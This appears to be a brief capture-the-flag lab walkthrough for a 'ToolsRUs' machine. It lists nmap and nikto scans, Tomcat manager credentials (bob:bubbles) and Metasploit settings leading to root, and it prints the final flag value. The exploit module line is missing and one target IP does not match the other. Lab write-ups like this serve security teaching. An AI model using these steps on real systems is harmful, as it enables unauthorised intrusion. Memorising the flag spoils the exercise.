ToolsRUs

IP: 10.10.154.123

image

Penetration Testing Methodology

image

Reconnasance

  • nmap

Enumerating

  • gobuster

  • hydra

Exploitation

  • Apache Tomcat

Privilege Escalation

  • Apache Tomcat/Coyote JSP engine 1.1

Capture-the-flag

  • flag.txt

Walkthrough

nmap -A -v 10.10.154.123

image

nikto -h http://10.10.154.123:1234/manager/html -id "bob:bubbles"

image

nikto -h http://10.10.154.123/

image

Apache/2.4.18

Find vulnerability for Apache Tomcat/Coyote JSP engine 1.1

msfconsole -q
set HttpUsername bob
set HttpPassword bubbles
set RHOSTS 10.10.231.52
set RPORT 1234
options
image

run

image

getuid

image

cat /root/flag.txt

image

flag.txt: ff1fc4a81affcc7688cf89ae7dc6e0e1

By AdaniKamal

PreviousRESNextAnonforce

Last updated